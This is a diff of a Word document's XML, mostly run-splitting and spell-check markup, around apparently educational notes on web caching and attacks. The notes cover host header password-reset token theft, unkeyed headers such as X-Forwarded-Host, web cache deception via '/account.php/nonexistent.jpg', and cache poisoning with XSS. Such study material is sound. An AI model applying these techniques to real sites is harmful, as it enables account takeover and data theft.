         </w:rPr>
-        <w:t xml:space="preserve"> the attacker server logs , thus the attacker will take this token and resetting the victim’s password.</w:t>
+        <w:t xml:space="preserve"> the attacker server </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>logs ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thus the attacker will take this token and resetting the victim’s password.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2960,6 +3339,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Best exploitation for Host Header attack</w:t>
       </w:r>
     </w:p>
@@ -3014,7 +3394,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Using this technique, an attacker can </w:t>
       </w:r>
       <w:r>
@@ -4765,7 +5144,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>of users accessing the web site also Retrieving content from web servers can be both slow  – especially if the file being retrieved is large or the server remote topologically – as well as “expensive” to generate for the source web server in terms of computing power if it has to be dynamically generated.</w:t>
+        <w:t xml:space="preserve">of users accessing the web site also Retrieving content from web servers can be both </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>slow  –</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> especially if the file being retrieved is large or the server remote topologically – as well as “expensive” to generate for the source web server in terms of computing power if it has to be dynamically generated.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5043,7 +5440,53 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> – CDNs such as cloudflare , Akamai or Speedera are located across the world and are generally leased by commercial </w:t>
+        <w:t xml:space="preserve"> – CDNs such as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>cloudflare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Akamai or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Speedera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are located across the world and are generally leased by commercial </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5075,7 +5518,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> for a local CDN server operated by the CDN company that is authorised to masquerade as if it were the origin server, caching content from that provider for all users within a given region and drastically reducing the volume of requests made to the origin servers.</w:t>
+        <w:t xml:space="preserve"> for a local CDN server operated by the CDN company that is </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>authorised</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to masquerade as if it were the origin server, caching content from that provider for all users within a given region and drastically reducing the volume of requests made to the origin servers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5553,7 +6014,27 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>of loads if the set of upstream servers changes.</w:t>
+        <w:t xml:space="preserve">of loads if the set of upstream </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>servers</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> changes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6042,7 +6523,27 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>s-maxage’ directive is specifically for shared caches such as CDNs, and it dictates how long those shared caches can keep serving up the resource from cache. This directive overrides the ‘max-age’ directive for individual clients.</w:t>
+        <w:t>s-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>maxage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>’ directive is specifically for shared caches such as CDNs, and it dictates how long those shared caches can keep serving up the resource from cache. This directive overrides the ‘max-age’ directive for individual clients.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6117,7 +6618,17 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The no-cache directive means that a browser may cache a response, but must first submit a validation request to an origin server.</w:t>
+        <w:t xml:space="preserve">The no-cache directive means that a browser may cache a response, but must first submit a validation request to an origin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>server.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6126,7 +6637,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>This is typically done using an ETag.</w:t>
+        <w:t>This</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is typically done using an ETag.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6503,7 +7025,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The old Pragma header accomplishes many things most of them characterized by newer implementations. We are however most concerned with the Pragma: no-cache directive which is interpreted by newer implementations as Cache-Control: no-cache. You don't need to be concerned about this directive because it's a request header which will be ignored by KeyCDN's edge servers. It is however important to be aware of the directive for the overall understanding. Going forward, there won't be new HTTP directives defined for Pragma</w:t>
+        <w:t xml:space="preserve">The old Pragma header accomplishes many things most of them characterized by newer implementations. We are however most concerned with the Pragma: no-cache directive which is interpreted by newer implementations as Cache-Control: no-cache. You don't need to be concerned about this directive because it's a request header which will be ignored by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>KeyCDN's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> edge servers. It is however important to be aware of the directive for the overall understanding. Going forward, there won't be new HTTP directives defined for Pragma</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6553,7 +7093,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">A couple of years back, this was the main way of specifying when assets expire.. </w:t>
+        <w:t xml:space="preserve">A couple of years back, this was the main way of specifying when assets </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>expire..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6652,7 +7210,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">-maxage </w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>maxage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6676,7 +7252,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> take precedence on most modern systems.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>take</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> precedence on most modern systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7126,15 +7720,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>specifies that a cached version must exist for each combination of user agent and language..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (used for specifying cache keys)</w:t>
+        <w:t xml:space="preserve">specifies that a cached version must exist for each combination of user agent and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>language..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>used</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for specifying cache keys)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7202,13 +7824,23 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>So caching sounds like it is massively beneficial, reducing both network delay (lag) and server loads. However, caching has limitations. A caching system needs to have at least two key functionalities in place:</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> caching sounds like it is massively beneficial, reducing both network delay (lag) and server loads. However, caching has limitations. A caching system needs to have at least two key functionalities in place:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7233,7 +7865,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Time limits for how long to cache an item (i.e. File, HTTP Request, etc.) for; and</w:t>
+        <w:t>Time limits for how long to cache an item (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>i.e.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> File, HTTP Request, etc.) for; and</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7343,7 +7993,27 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Resources change and are updated so the cache needs to have a finite lifetime for each cached resource. We wouldn’t be happy if we requested the BBC News webpage on May 5th and found out that the news we were reading was from September the previous year. Cache items therefore have expiry time limits.</w:t>
+        <w:t xml:space="preserve">Resources change and are updated so the cache needs to have a finite lifetime for each cached resource. We wouldn’t be happy if we requested the BBC News webpage on May 5th and found out that the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>news</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we were reading was from September the previous year. Cache items therefore have expiry time limits.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7423,7 +8093,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">such as images, css files JS files ...etc. </w:t>
+        <w:t xml:space="preserve">such as images, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>css</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> files JS files ...etc. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7744,7 +8432,47 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> by comparing a predefined some of the http request's components, known collectively as the "cache key". Such as {user-agent , host header , url parameters , … }. </w:t>
+        <w:t xml:space="preserve"> by comparing a predefined some of the http request's components, known collectively as the "cache key". Such as {user-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>agent ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> host header , </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parameters , … }. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7800,7 +8528,27 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>X-Forwarded-Host : (Host header attack)</w:t>
+        <w:t>X-Forwarded-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Host :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Host header attack)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7828,7 +8576,27 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>X-Host : (Host header attack)</w:t>
+        <w:t>X-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Host :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Host header attack)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7856,8 +8624,19 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>X-forwarded-Server :</w:t>
-      </w:r>
+        <w:t>X-forwarded-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Server :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7881,8 +8660,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>X-Original-Url :</w:t>
-      </w:r>
+        <w:t>X-Original-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7906,8 +8705,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>X-Rewrite-Url :</w:t>
-      </w:r>
+        <w:t>X-Rewrite-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7964,7 +8783,31 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">(the </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8230,7 +9073,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>WCD attacks arise when there is a contradiction between how a cache and an origin server interpret a given HTTP request. For instance, an attacker can craft a URL that points to the account information on a banking website but append to it a non-existent path component disguised as a static image, such as “/account.php/nonexistent.jpg.” Many origin servers will simply ignore the invalid suffix as spurious and respond with account details.</w:t>
+        <w:t>WCD attacks arise when there is a contradiction between how a cache and an origin server interpret a given HTTP request. For instance, an attacker can craft a URL that points to the account information on a banking website but append to it a non-existent path component disguised as a static image, such as “/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>account.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/nonexistent.jpg.” Many origin servers will simply ignore the invalid suffix as spurious and respond with account details.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8613,7 +9474,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">For example, an attacker could find a webpage vulnerable to reflected XSS. However reflected XSS is difficult for the hacker to exploit, since it requires getting a user to click on a specific link with the malicious payload within in. If however the attacker finds that the server in question has a cache and will store the malicious response payload in that cache, then future users requesting the page will have a malicious response returned from the cache. Executing the attacker’s arbitrary </w:t>
+        <w:t xml:space="preserve">For example, an attacker could find a webpage vulnerable to reflected XSS. However reflected XSS is difficult for the hacker to exploit, since it requires getting a user to click on a specific link with the malicious payload within in. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>If</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> however the attacker finds that the server in question has a cache and will store the malicious response payload in that cache, then future users requesting the page will have a malicious response returned from the cache. Executing the attacker’s arbitrary </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8813,7 +9692,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Cached responses can mask unkeyed inputs, so if you're trying to manually detect or explore unkeyed inputs, a cache-buster is crucial. If you have Param Miner loaded, you can ensure every request has a unique cache key by adding a parameter with a value of $randomplz to the query string.</w:t>
+        <w:t>Cached responses can mask unkeyed inputs, so if you're trying to manually detect or explore unkeyed inputs, a cache-buster is crucial. If you have Param Miner loaded, you can ensure every request has a unique cache key by adding a parameter with a value of $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>randomplz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the query string.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9099,7 +9996,61 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Heavily cache static response, such as *.js, *.css, *.png files, blog posts, landing pages or any page that is always identical.</w:t>
+        <w:t>Heavily cache static response, such as *.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
